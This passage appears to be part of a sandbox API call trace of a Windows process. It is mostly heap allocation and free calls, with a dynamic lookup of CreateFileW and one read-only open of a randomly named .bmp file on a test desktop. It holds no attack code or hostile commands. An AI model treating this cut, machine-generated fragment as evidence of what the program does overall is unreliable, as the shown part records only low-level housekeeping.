CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0129.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392458 | out: hHeap=0x1780000) returned 1 [0129.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0129.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0129.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25e0 [0129.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0129.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0129.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0129.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0129.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0129.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0129.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0129.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0129.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0129.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2600 [0129.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0129.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0129.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0129.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0129.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0129.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0129.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0129.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0129.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0129.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0129.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0129.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0129.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0129.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0129.310] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0129.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0129.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0129.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0129.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0129.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0129.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0129.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0129.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0129.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0129.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0129.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0129.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0129.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0129.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0129.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0129.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0129.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0129.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0129.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0129.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0129.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0129.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0129.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0129.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0129.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0129.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0129.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0129.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0129.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0129.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0129.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0129.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0129.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0129.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0129.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0129.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0129.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0129.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0129.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0129.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0129.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0129.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0129.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0129.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0129.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0129.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0129.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0129.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0129.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0129.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0129.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0129.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0129.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0129.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0129.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0129.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0129.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0129.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0129.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0129.313] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0129.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0129.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0129.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0129.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0129.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0129.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0129.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0129.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0129.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0129.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0129.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0129.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0129.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0129.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0129.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0129.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0129.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0129.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0129.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0129.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0129.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0129.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0129.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0129.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0129.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0129.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0129.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0129.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0129.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0129.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0129.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0129.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0129.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0129.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0129.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0129.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0129.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0129.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0129.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0129.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0129.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0129.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0129.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0129.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0129.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0129.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0129.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0129.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0129.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0129.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0129.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0129.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0129.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0129.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0129.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0129.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0129.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0129.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0129.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0129.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0129.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0129.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0129.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0129.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0129.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0129.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0129.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0129.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0129.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0129.422] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0129.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0129.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0129.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf40 [0129.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caf40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0129.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0129.423] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0129.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0129.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0129.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0129.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0129.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0129.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0129.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0129.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0129.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0129.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0129.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0129.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0129.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0129.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0129.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0129.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0129.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0129.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0129.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0129.424] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\1aQmLq17nlG1P.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\1aqmlq17nlg1p.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0129.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0129.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0129.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0129.424] 